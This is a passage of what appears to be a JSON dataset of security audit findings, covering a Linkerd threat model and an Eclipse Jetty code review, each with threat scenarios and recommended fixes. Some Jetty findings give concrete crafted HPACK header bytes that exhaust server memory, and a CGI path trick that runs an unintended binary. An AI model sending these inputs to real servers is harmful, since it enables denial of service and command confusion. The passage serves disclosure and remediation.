attacker obtains access to the sidecar proxy in one of the user application namespaces. Due to the lack of rate-limiting mechanisms within the destination service, the proxy can now repeatedly request routing information or change its availability status to force updates in the controller. Recommendations Short term, add rate-limiting mechanisms to the destination service to prevent a single pod from requesting too much routing information or performing state updates too quickly. Long term, ensure that appropriate rate-limiting mechanisms exist throughout the infrastructure to prevent denial-of-service attacks. Where possible, implement stricter access controls to ensure that components cannot interact with APIs more than necessary. Additionally, ensure that the system sufficiently logs events so that an audit trail is available in the event of an attack.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "3. CLI tool allows the use of insecure protocols when externally sourcing infrastructure definitions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "When using the command-line interface (CLI) tool, an operator may source infrastructural YAML definitions from a URI path specifying any protocol, such as http:// or https://. Therefore, a user could expose sensitive information when using an insecure protocol such as HTTP. Furthermore, the Linkerd documentation does not warn users about the system's use of insecure protocols. Threat Scenario An infrastructure operator integrates Linkerd into her infrastructure.
When doing so, she uses the CLI tool to fetch YAML definitions over HTTP. Unbeknownst to her, the use of HTTP has made her data visible to attackers on the local network. Her data is also prone to man-in-the-middle attacks. Recommendations Short term, disallow the use of insecure protocols within the CLI tool when sourcing external data. Alternatively, provide documentation and best practices regarding the use of insecure protocols when externally sourcing data within the CLI tool.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "5. Go's pprof endpoints enabled by default in all admin servers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "All core components of the Linkerd infrastructure, in both the data and control planes, have an admin server with Go's server runtime profiler (pprof) endpoints on /debug/pprof enabled by default. These servers are not exposed to the rest of the cluster or to the local network by default. Threat Scenario An attacker scans the network in which a Linkerd cluster is configured and discovers that an operator forwarded the admin server port to the local network, exposing the pprof endpoints to the local network. He connects a profiler to it and gains access to debug information, which assists him in mounting further attacks. Recommendations Short term, add a check to http.go that enables pprof endpoints only when Linkerd runs in debug or test mode. Long term, audit all debug-related functionality to ensure it is not exposed when Linkerd is running in production mode. References Your pprof is showing: IPv4 scans reveal exposed net/http/pprof endpoints", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "6. Lack of access controls on the linkerd-viz dashboard ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "Linkerd operators can enable a set of metrics-focused features by adding the linkerd-viz extension. Doing so enables a web UI dashboard that lists detailed information about the namespaces, services, pods, containers, and other resources in a Kubernetes cluster in which Linkerd is configured. Operators can enable Kubernetes role-based access controls to the dashboard; however, no access control options are provided by Linkerd. Threat Scenario An attacker scans the network in which a Linkerd cluster is configured and discovers an exposed UI dashboard. By accessing the dashboard, she gains valuable insight into the cluster. She uses the knowledge gained from exploring the dashboard to formulate attacks that would expand her access to the network. Recommendations Short term, document recommendations for restricting access to the linkerd-viz dashboard. Long term, add authentication and authorization controls for accessing the dashboard. This could be done by implementing tokens created via the CLI or client-side authorization logic.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "7. 
Prometheus endpoints reachable from the user application namespace ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "The linkerd-viz extension provides a Prometheus API that collects metrics data from the various proxies and controllers used by the control and data planes. Metrics can include various labels with IP addresses, pod IDs, and port numbers. Threat Scenario An attacker gains access to a user application pod and calls the API directly to read Prometheus metrics. He uses the API to gain information about the cluster that aids him in expanding his access across the Kubernetes infrastructure. Recommendations Short term, disallow access to the Prometheus extension from the user application namespace. This could be done in the same manner in which access to the web dashboard is restricted from within the cluster (e.g., by allowing access only for specific hosts).", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "8. Lack of egress access controls ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "Linkerd provides access control mechanisms for ingress traffic but not for egress traffic. Egress controls would allow an operator to impose important restrictions, such as which external services and endpoints a meshed application running in the application namespace can communicate with. Threat Scenario A user application becomes compromised. As a result, the application code begins making outbound requests to malicious endpoints. The lack of access controls on egress traffic prevents infrastructure operators from mitigating the situation (e.g., by allowing the application to communicate with only a set of allowlisted external services). Recommendations Short term, add support for enforcing egress network policies. A GitHub issue to implement this recommendation already exists in the Linkerd repository.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "9. Prometheus endpoints are unencrypted and unauthenticated by default ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "The linkerd-viz extension provides a Prometheus API that collects metrics data from the various proxies and controllers used by the control and data planes. However, this endpoint is unencrypted and unauthenticated, lacking access and confidentiality controls entirely. Threat Scenario An attacker gains access to a sibling component within the same namespace in which the Prometheus endpoint exists. Due to the lack of access controls, the attacker can now laterally obtain Prometheus metrics with ease. Additionally, due to the lack of confidentiality controls, such as those implemented through the use of cryptography, connections are exposed to other parties. Recommendations Short term, consider implementing access controls within Prometheus and Kubernetes to disallow access to the Prometheus metrics endpoint from any machine within the cluster that is irrelevant to Prometheus logging. Additionally, implement secure encryption of connections with the use of TLS within Prometheus or leverage existing Linkerd mTLS schemes.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "10. 
Shared identity and destination services in a cluster pose risks to multi-application clusters ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "The identity and destination controllers are meant to convey certificate and routing information for proxies, respectively. However, only one identity controller and one destination controller are deployed in a cluster, so they are shared among all application pods within a cluster. As a result, a single application pod could pollute records, causing denial-of-service attacks or otherwise compromising these cluster-wide components. Additionally, a compromise of these cluster-wide components may result in the exposure of routing information for each application pod. Although the Kubernetes API server is exposed with the same architecture, it may be beneficial to minimize the attack surface area and the data that can be exfiltrated from compromised Linkerd components. Threat Scenario An attacker gains access to a single user application pod and begins to launch attacks against the identity and destination services. As a result, these services cannot serve other user application pods. The attacker later finds a way to compromise one of these two services, allowing her to leak sensitive application traffic from other user application pods. Recommendations Short term, implement per-pod identity and destination services that are isolated from other pods. If this is not viable, consider documenting this caveat so that users are aware of the risks of hosting multiple applications within a single cluster.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "11. Lack of isolation between components and their sidecar proxies ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "Within the Linkerd, linkerd-viz, and user application namespaces, each core component lives alongside a linkerd-proxy container, which proxies the component's traffic and provides mTLS for internal connections. However, because the sidecar proxies are not isolated from their corresponding components, the compromise of a component would mean the compromise of its proxy, and vice versa. This is particularly interesting when considering the lack of access controls for some components, as detailed in TOB-LKDTM-4: proxy admin endpoints are exposed to the applications they are proxying, allowing metrics collection and shutdown requests to be made. Threat Scenario An attacker exploits a vulnerability to gain access to a linkerd-proxy instance. As a result, the attacker is able to compromise the confidentiality, integrity, and availability of lateral components, such as user applications, identity and destination services within the Linkerd namespace, and extensions within the linkerd-proxy namespace. Recommendations Short term, document system caveats and sensitivities so that operators are aware of them and can better defend themselves against attacks. Consider employing health checks that verify the integrity of proxies and other components to ensure that they have not been compromised. Long term, investigate ways to isolate sidecar proxies from the components they are proxying (e.g., by setting stricter access controls or leveraging isolated namespaces between proxied components and their sidecars).
", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "4. Exposure of admin endpoint may affect application availability ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "User application sidecar proxies expose an admin endpoint that can be used for tasks such as shutting down the proxy server and collecting metrics. This endpoint is exposed to other components within the same pod. Therefore, an internal attacker could shut down the proxy, affecting the user application's availability. Furthermore, the admin endpoint lacks access controls, and the documentation does not warn of the risks of exposing the admin endpoint over the internet.
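As one hedged illustration of the short-term recommendation below, a shutdown route can be gated behind a bearer token (illustrative Java using the JDK's built-in HTTP server; linkerd-proxy itself is written in Rust, and the port and token mechanism here are placeholders):

import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpServer;
import java.io.IOException;
import java.net.InetSocketAddress;

// Illustrative only: an admin server whose shutdown endpoint requires a bearer token,
// so pod-local neighbors cannot kill the proxy unauthenticated.
public class AdminAuthSketch {
    private static final String TOKEN = System.getenv("ADMIN_TOKEN"); // injected per pod (placeholder)

    public static void main(String[] args) throws IOException {
        HttpServer server = HttpServer.create(new InetSocketAddress("127.0.0.1", 4191), 0);
        server.createContext("/shutdown", (HttpExchange ex) -> {
            String auth = ex.getRequestHeaders().getFirst("Authorization");
            if (TOKEN == null || !("Bearer " + TOKEN).equals(auth)) {
                ex.sendResponseHeaders(401, -1); // reject unauthenticated shutdown requests
                ex.close();
                return;
            }
            ex.sendResponseHeaders(204, -1);
            ex.close();
            server.stop(0); // authorized shutdown
        });
        server.start();
    }
}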
Threat Scenario An infrastructure operator integrates Linkerd into his Kubernetes cluster. After a new user application is deployed, an underlying component within the same pod is compromised. An attacker with access to the compromised component can now laterally send a request to the admin endpoint used to shut down the proxy server, resulting in a denial of service of the user application. Recommendations Short term, employ authentication and authorization mechanisms behind the admin endpoint for proxy servers. Long term, document the risks of exposing critical components throughout Linkerd. For instance, it is important to note that exposing the admin endpoint on a user application proxy server may result in the exposure of a shutdown method, which could be leveraged in a denial-of-service attack.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "12. Lack of centralized security best practices documentation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "While security recommendations are included throughout Linkerd's technical guidance documents, there is no centralized guidance on security best practices. Furthermore, the documentation on securing clusters lacks guidance on security best practices such as configuring timeouts and retries, authorization policy recommendations for defense in depth, and locking down access to linkerd-viz components. Threat Scenario A user is unaware of security best practices and configures Linkerd in an insecure manner. As a result, her Linkerd infrastructure is prone to attacks that could compromise the confidentiality, integrity, and availability of data handled by the cluster. Recommendations Short term, develop centralized documentation on security recommendations with a focus on security-in-depth practices for users to follow. This guidance should be easy to locate should any user wish to follow security best practices when using Linkerd.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Informational" + ] + }, + { + "title": "13. Unclear distinction between Linkerd and Linkerd2 in official Linkerd blog post guidance ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "The official Linkerd documentation clearly indicates the version of Linkerd that each document pertains to. For instance, documentation specific to Linkerd 1.x displays a message stating, \"This is not the latest version of Linkerd!\" However, guidance documented in blog post form on the same site does not provide such information. For instance, the first result of a Google search for Linkerd RBAC is a Linkerd blog post with guidance that is applicable only to Linkerd 1.x, but there is no indication of this fact on the page. As a result, users who rely on these blog posts may misunderstand functionality in Linkerd versions 2.x and above. Threat Scenario A user searches for guidance on implementing various Linkerd features and finds documentation in blog posts that applies only to Linkerd version 1.x. As a result, he misunderstands Linkerd and its threat model, and he makes configuration mistakes that lead to security issues. Recommendations Short term, on Linkerd blog post pages, add indicators similar to the UI elements used in the Linkerd documentation to clearly indicate which version each guidance page applies to.
", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Informational" + ] + }, + { + "title": "14. Insufficient logging of outbound HTTPS calls ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "Linkerd operators can use the linkerd-viz extensions such as Prometheus and Grafana to collect metrics for the various proxies in a Linkerd infrastructure. However, these extensions do not collect metrics on outbound calls made by meshed applications. This limits the data that operators could use to conduct incident response procedures if compromised applications reach out to malicious external services and servers. Threat Scenario A meshed application running in the data plane is compromised as a result of a supply chain attack. Because outbound HTTPS calls are not logged, Linkerd operators are unable to collect sufficient data to determine the impact of the vulnerability. Recommendations Short term, implement logging for outbound HTTPS connections. A GitHub issue to implement this recommendation already exists in the Linkerd repository but is still unresolved as of this writing. A. Methodology A threat modeling assessment is intended to provide a detailed analysis of the risks that an application faces at the structural and operational level; the goal is to assess the security of the application's design rather than its implementation details. During these assessments, engineers rely heavily on frequent meetings with the client's developers and on extensive reading of all documentation provided by the client. Code review and dynamic testing are not part of the threat modeling process, although engineers may occasionally consult the codebase or a live instance of the project to verify assumptions about the system's design. Engineers begin a threat modeling assessment by identifying the safeguards and guarantees that are critical to maintaining the target system's confidentiality, integrity, and availability. These security controls dictate the assessment's overarching scope and are determined by the requirements of the target system, which may relate to technical and reputational concerns, legal liability, and regulatory compliance. With these security controls in mind, engineers then divide the system into logical components (discrete elements that perform specific tasks) and establish trust zones around groups of components that lie within a common trust boundary. They identify the types of data handled by the system, enumerating the points at which data is sent, received, or stored by each component, as well as within and across trust boundaries. After establishing a detailed map of the target system's structure and data flows, engineers then identify threat actors (anyone who might threaten the target's security, including both malicious external actors and naive internal actors). Based on each threat actor's initial privileges and knowledge, engineers then trace threat actor paths through the system, determining the controls and data that a threat actor might be able to improperly access, as well as the safeguards that prevent such access. Any viable attack path discovered during this process constitutes a finding, which is paired with design recommendations to remediate gaps in the system's defenses. Finally, engineers rate the strength of each security control, indicating the general robustness of that type of defense against the full spectrum of possible attacks.
These ratings are provided in the Security Control Maturity Evaluation table. B. Security Controls and Rating Criteria The following tables describe the security controls and rating criteria used in this report. Security Controls Category", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "1. Risk of integer overflow that could allow HpackDecoder to exceed maxHeaderSize ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "An integer overflow could occur in the MetaDataBuilder.checkSize function, which would allow HPACK header values to exceed their size limit. MetaDataBuilder.checkSize determines whether a header name or value exceeds the size limit and throws an exception if the limit is exceeded: 291 public void checkSize(int length, boolean huffman) throws SessionException 292 { 293 // Apply a huffman fudge factor 294 if (huffman) 295 length = (length * 4) / 3; 296 if ((_size + length) > _maxSize) 297 throw new HpackException.SessionException(\"Header too large %d > %d\", _size + length, _maxSize); 298 } Figure 1.1: MetaDataBuilder.checkSize However, when the value of length is very large and huffman is true, the multiplication of length by 4 in line 295 will overflow, and length will become negative. This will cause the result of the sum of _size and length to be negative, and the check on line 296 will not be triggered. Exploit Scenario An attacker repeatedly sends HTTP messages with the HPACK header 0x00ffffffffff02. Each time this header is decoded, the following occurs: HpackDecode.decode determines that a Huffman-coded value of length 805306494 needs to be decoded. MetaDataBuilder.checkSize approves this length. Huffman.decode allocates a 1.6 GB string array. Huffman.decode experiences a buffer overflow error, and the array is deallocated the next time garbage collection happens. (Note that this deallocation can be delayed by appending valid Huffman-coded characters to the end of the header.) Depending on the timing of garbage collection, the number of threads, and the amount of memory available on the server, this may cause the server to run out of memory. Recommendations Short term, have MetaDataBuilder.checkSize check that length is below a threshold before performing the multiplication. Long term, use fuzzing to check for similar errors; we found this issue by fuzzing HpackDecode.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "2. Cookie parser accepts unmatched quotation marks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The RFC6265CookieParser.parseField function does not check for unmatched quotation marks. For example, parseField(\\) will execute without raising an exception. This issue is unlikely to lead to any vulnerabilities, but it could lead to problems if users or developers expect the function to accept only valid strings. Recommendations Short term, modify the function to check that the state at the end of the given string is not IN_QUOTED_VALUE. Long term, when using a state machine, ensure that the code always checks that the state is valid before exiting.
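The end-of-input check can be sketched as follows (illustrative Java; State and the loop are simplified stand-ins for the parser's real state machine):

// Illustrative only: toggle in and out of the quoted state, then validate at end-of-input.
public class QuoteChecker {
    enum State { VALUE, IN_QUOTED_VALUE }

    static void parseField(String s) {
        State state = State.VALUE;
        for (char c : s.toCharArray()) {
            if (c == '"') state = (state == State.VALUE) ? State.IN_QUOTED_VALUE : State.VALUE;
        }
        // The missing check: an open quote at end-of-input means the field is malformed.
        if (state == State.IN_QUOTED_VALUE)
            throw new IllegalArgumentException("unmatched quotation mark");
    }

    public static void main(String[] args) {
        parseField("a=\"ok\"");      // accepted
        parseField("a=\"unclosed"); // now rejected instead of silently accepted
    }
}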
", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. Errant command quoting in CGI servlet ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "If a user sends a request to a CGI servlet for a binary with a space in its name, the servlet will escape the command by wrapping it in quotation marks. This wrapped command, plus an optional command prefix, will then be executed through a call to Runtime.exec. If the original binary name provided by the user contains a quotation mark followed by a space, the resulting command line will contain multiple tokens instead of one. For example, if a request references a binary called file\" name here, the escaping algorithm will generate the command line string \"file\" name here\", which will invoke the binary named file, not the one that the user requested. if (execCmd.length() > 0 && execCmd.charAt(0) != '\"' && execCmd.contains(\" \")) execCmd = \"\\\"\" + execCmd + \"\\\"\"; Figure 3.1: CGI.java#L337-L338 Exploit Scenario The cgi-bin directory contains a binary named exec and a subdirectory named exec commands, which contains a file called bin1. A user sends to the CGI servlet a request for the filename exec commands/bin1. This request passes the file existence check on lines 194 through 205 in CGI.java. The servlet adds quotation marks around this filename, resulting in the command line string \"exec commands/bin1\". When this string is passed to Runtime.exec, instead of executing the bin1 binary, the server executes the exec binary with the argument commands/bin1. This behavior is incorrect and could bypass alias checks; it could also cause other unintended behaviors if a command prefix is configured. Additionally, if the useFullPath configuration setting is off, the command would not need to pass the existence check. Without this setting, an attacker exploiting this issue would not have to rely on a binary and subdirectory with similar names, and the attack could succeed on a much wider variety of directory structures. Recommendations Short term, update line 346 in CGI.java to replace the call to exec(String command, String[] env, File dir) with a call to exec(String[] cmdarray, String[] env, File dir) so that the quotation mark escaping algorithm does not create new tokens in the command line string. Long term, update the quotation mark escaping algorithm so that any unescaped quotation marks in the original name of the command are properly escaped, resulting in one double-quoted token instead of multiple adjacent quoted strings. Additionally, the expression execCmd.charAt(0) != '\"' on line 337 of CGI.java is intended to avoid adding additional quotation marks to an already-quoted command string. If this check is unnecessary, it should be removed. If it is necessary, it should be replaced by a more robust check that accurately detects properly formatted double-quoted strings.
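The short-term recommendation can be sketched as follows (illustrative Java; the paths and binary name are hypothetical):

import java.io.File;
import java.io.IOException;

// Illustrative only: passing the command as a pre-tokenized array prevents embedded
// quotes and spaces from creating new tokens.
public class CgiExec {
    public static void main(String[] args) throws IOException {
        String requestedBinary = "exec commands/bin1"; // attacker-influenced name (hypothetical)
        String[] env = {};
        File dir = new File("/var/www/cgi-bin"); // hypothetical CGI directory

        // Buggy: the single-string overload re-tokenizes on whitespace, so this would run
        // "exec" with the argument "commands/bin1".
        // Runtime.getRuntime().exec("\"" + requestedBinary + "\"", env, dir);

        // Fixed: the array overload treats the whole name as one token.
        Runtime.getRuntime().exec(new String[] { requestedBinary }, env, dir);
    }
}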
", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "4. Symlink-allowed alias checker ignores protected targets list ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The class SymlinkAllowedResourceAliasChecker is an alias checker that permits users to access a symlink as long as the symlink is stored within an allowed directory. The following comment appears on line 76 of this class: // TODO: return !getContextHandler().isProtectedTarget(realURI.toString()); Figure 4.1: SymlinkAllowedResourceAliasChecker.java#L76 As this comment suggests, the alias checker does not yet enforce the context handler's protected resource list. That is, if a symlink is contained in an allowed directory but points to a target on the protected resource list, the alias checker will return a positive match. During our review, we found that some other modules, but not all, independently enforce the protected resource list and will decline to serve resources on the list even if the alias checker returns a positive result. But the modules that do not independently enforce the protected resource list could serve protected resources to attackers conducting symlink attacks. Exploit Scenario An attacker induces the creation of a symlink (or a system administrator accidentally creates one) in a web-accessible directory that points to a protected resource (e.g., a child of WEB-INF). By requesting this symlink through a servlet that uses the SymlinkAllowedResourceAliasChecker class, the attacker bypasses the protected resource list and accesses the sensitive files. Recommendations Short term, implement the check referenced in the comment so that the alias checker rejects symlinks that point to a protected resource or a child of a protected resource. Long term, consider clarifying and documenting the responsibilities of different components for enforcing protected resource lists. Consider implementing redundant checks in multiple modules for purposes of layered security.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "5. Missing check for malformed Unicode escape sequences in QuotedStringTokenizer.unquote ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The QuotedStringTokenizer class's unquote method parses \\u#### Unicode escape sequences, but it does not first check that the escape sequence is properly formatted or that the string is of a sufficient length: case 'u': b.append((char)( (TypeUtil.convertHexDigit((byte)s.charAt(i++)) << 24) + (TypeUtil.convertHexDigit((byte)s.charAt(i++)) << 16) + (TypeUtil.convertHexDigit((byte)s.charAt(i++)) << 8) + (TypeUtil.convertHexDigit((byte)s.charAt(i++))) )); break; Figure 5.1: QuotedStringTokenizer.java#L547-L555 Any calls to this function with an argument ending in an incomplete Unicode escape sequence, such as str\\u0, will cause the code to throw a java.lang.NumberFormatException exception. The only known execution path that will cause this method to be called with a parameter ending in an invalid Unicode escape sequence is to induce the processing of an ETag Matches header by the ResourceService class, which calls EtagUtils.matches, which calls QuotedStringTokenizer.unquote. Exploit Scenario An attacker introduces a maliciously crafted ETag into a browser's cache.
Each subsequent request for the affected resource causes a server-side exception, preventing the server from producing a valid response so long as the cached ETag remains in place. Recommendations Short term, add a try-catch block around the affected code that drops malformed escape sequences. Long term, implement a suitable workaround for lenient mode that passes the raw bytes of the malformed escape sequence into the output.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "6. WebSocket frame length represented with 32-bit integer ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The WebSocket standard (RFC 6455) allows for frames with a size of up to 2^64 bytes. However, the WebSocket parser represents the frame length with a 32-bit integer: private int payloadLength; // ...[snip]... case PAYLOAD_LEN_BYTES: { byte b = buffer.get(); --cursor; payloadLength |= (b & 0xFF) << (8 * cursor); // ...[snip]... } Figure 6.1: Parser.java, lines 57 and 147-151 As a result, this parsing algorithm will incorrectly parse some length fields as negative integers, causing a java.lang.IllegalArgumentException exception to be thrown when the parser tries to set the limit of a Buffer object to a negative number (refer to TOB-JETTY-7). Consequently, Jetty's WebSocket implementation cannot properly process frames with certain lengths that are compliant with RFC 6455. Even if no exception results, this logic error will cause the parser to incorrectly identify the sizes of WebSocket frames and the boundaries between them. If the server passes these frames to another WebSocket connection, this bug could enable attacks similar to HTTP request smuggling, resulting in bypasses of security controls. Exploit Scenario A Jetty WebSocket server is deployed in a reverse proxy configuration in which both Jetty and another web server parse the same stream of WebSocket frames. An attacker sends a frame with a length that the Jetty parser incorrectly truncates to a 32-bit integer. Jetty and the other server interpret the frames differently, which causes errors in the implementation of security controls, such as WAF filters. Recommendations Short term, change the payloadLength variable to use the long data type instead of an int. Long term, audit all arithmetic operations performed on this payloadLength variable to ensure that it is always used as an unsigned integer instead of a signed one. The standard library's Integer class can provide this functionality.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "7. WebSocket parser does not check for negative payload lengths ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The WebSocket parser's checkFrameSize method checks for payload lengths that exceed the current configuration's maximum, but it does not check for payload lengths that are lower than zero. If the payload length is lower than zero, the code will throw an exception when the payload length is passed to a call to buffer.limit. Exploit Scenario An attacker sends a WebSocket payload with a length field that parses to a negative signed integer (refer to TOB-JETTY-6).
This payload causes an exception to be thrown and possibly the server process to crash. Recommendations Short term, update checkFrameSize to throw an org.eclipse.jetty.websocket.core.exception.ProtocolException exception if the frame's length field is less than zero. 8. WebSocket parser greedily allocates ByteBuffers for large frames Severity: Medium Difficulty: Low Type: Denial of Service Finding ID: TOB-JETTY-8 Target: org.eclipse.jetty.websocket.core.internal.Parser", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "9. Risk of integer overflow in HPACK's NBitInteger.decode ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The static function NBitInteger.decode is used to decode bytestrings in HPACK's integer format. It should return only positive integers since HPACK's integer format is not intended to support negative numbers. However, the following loop in NBitInteger.decode is susceptible to integer overflows in its multiplication and addition operations: public static int decode(ByteBuffer buffer, int n) { if (n == 8) { // ... } int nbits = 0xFF >>> (8 - n); int i = buffer.get(buffer.position() - 1) & nbits; if (i == nbits) { int m = 1; int b; do { b = 0xff & buffer.get(); i = i + (b & 127) * m; m = m * 128; } while ((b & 128) == 128); } return i; } Figure 9.1: NBitInteger.java, lines 105-145 For example, NBitInteger.decode(0xFF8080FFFF0F, 7) returns -16257. Any overflow that occurs in the function would not be a problem on its own since, in general, the output of this function ought to be validated before it is used; however, when coupled with other issues (refer to TOB-JETTY-10), an overflow can cause vulnerabilities. Recommendations Short term, modify NBitInteger.decode to check that its result is nonnegative before returning it. Long term, consider merging the QPACK and HPACK implementations for NBitInteger, since they perform the same functionality; the QPACK implementation of NBitInteger checks for overflows.
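An overflow-checked variant can be sketched as follows (illustrative Java; this simplified decoder reads the prefix byte directly rather than via buffer.position() as the real code does):

import java.nio.ByteBuffer;

// Illustrative only: Math.addExact/multiplyExact throw ArithmeticException
// instead of silently wrapping to a negative value.
public class SafeNBitInteger {
    public static int decode(ByteBuffer buffer, int n) {
        int nbits = 0xFF >>> (8 - n);
        int i = buffer.get() & nbits;
        if (i == nbits) {
            int m = 1;
            while (true) {
                int b = 0xFF & buffer.get();
                i = Math.addExact(i, Math.multiplyExact(b & 127, m));
                if ((b & 128) != 128) break;
                m = Math.multiplyExact(m, 128); // only advance m when more bytes follow
            }
        }
        return i; // cannot be negative: any overflow has already thrown
    }

    public static void main(String[] args) {
        // The finding's example input now fails loudly instead of returning -16257.
        ByteBuffer buf = ByteBuffer.wrap(new byte[] {
            (byte) 0xFF, (byte) 0x80, (byte) 0x80, (byte) 0xFF, (byte) 0xFF, 0x0F });
        try { System.out.println(decode(buf, 7)); }
        catch (ArithmeticException e) { System.out.println("rejected: overflow"); }
    }
}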
", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "10. MetaDataBuilder.checkSize accepts headers of negative lengths ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The MetaDataBuilder.checkSize function accepts user-entered HPACK header values of negative sizes, which could cause a very large buffer to be allocated later when the user-entered size is multiplied by 2. MetaDataBuilder.checkSize determines whether a header name or value exceeds the size limit and throws an exception if the limit is exceeded: public void checkSize(int length, boolean huffman) throws SessionException { // Apply a huffman fudge factor if (huffman) length = (length * 4) / 3; if ((_size + length) > _maxSize) throw new HpackException.SessionException(\"Header too large %d > %d\", _size + length, _maxSize); } Figure 10.1: MetaDataBuilder.java, lines 291-298 However, it does not throw an exception if the size is negative. Later, the Huffman.decode function multiplies the user-entered length by 2 before allocating a buffer: public static String decode(ByteBuffer buffer, int length) throws HpackException.CompressionException { Utf8StringBuilder utf8 = new Utf8StringBuilder(length * 2); // ... Figure 10.2: Huffman.java, lines 357-359 This means that if a user provides a negative length value (or, more precisely, a length value that becomes negative when multiplied by the 4/3 fudge factor), and this length value becomes a very large positive number when multiplied by 2, then the user can cause a very large buffer to be allocated on the server. Exploit Scenario An attacker repeatedly sends HTTP messages with the HPACK header 0x00ff8080ffff0b. Each time this header is decoded, the following occurs: HpackDecode.decode determines that a Huffman-coded value of length -1073758081 needs to be decoded. MetaDataBuilder.checkSize approves this length. The number is multiplied by 2, resulting in 2147451134, and Huffman.decode allocates a 2.1 GB string array. Huffman.decode experiences a buffer overflow error, and the array is deallocated the next time garbage collection happens. (Note that this deallocation can be delayed by adding valid Huffman-coded characters to the end of the header.) Depending on the timing of garbage collection, the number of threads, and the amount of memory available on the server, this may cause the server to run out of memory. Recommendations Short term, have MetaDataBuilder.checkSize check that the given length is positive directly before adding it to _size and comparing it with _maxSize. Long term, add checks for integer overflows in Huffman.decode and in NBitInteger.decode (refer to TOB-JETTY-9) for added redundancy. 11. Insufficient space allocated when encoding QPACK instructions and entries Severity: Low Difficulty: High Type: Denial of Service Finding ID: TOB-JETTY-11 Target: org.eclipse.jetty.http3.qpack.internal.instruction.IndexedNameEntryInstruction, org.eclipse.jetty.http3.qpack.internal.instruction.LiteralNameEntryInstruction, org.eclipse.jetty.http3.qpack.internal.instruction.EncodableEntry", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "12. LiteralNameEntryInstruction incorrectly encodes value length ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "QPACK instructions for inserting entries with literal names and non-Huffman-coded values will be encoded incorrectly when the value's length is over 30, which could cause values to be sent incorrectly or errors to occur during decoding. The following snippet of the LiteralNameEntryInstruction.encode function is responsible for encoding the header value: 78 if (_huffmanValue) 79 { 80 byteBuffer.put((byte)(0x80)); 81 NBitIntegerEncoder.encode(byteBuffer, 7, HuffmanEncoder.octetsNeeded(_value)); 82 HuffmanEncoder.encode(byteBuffer, _value); 83 } 84 else 85 { 86 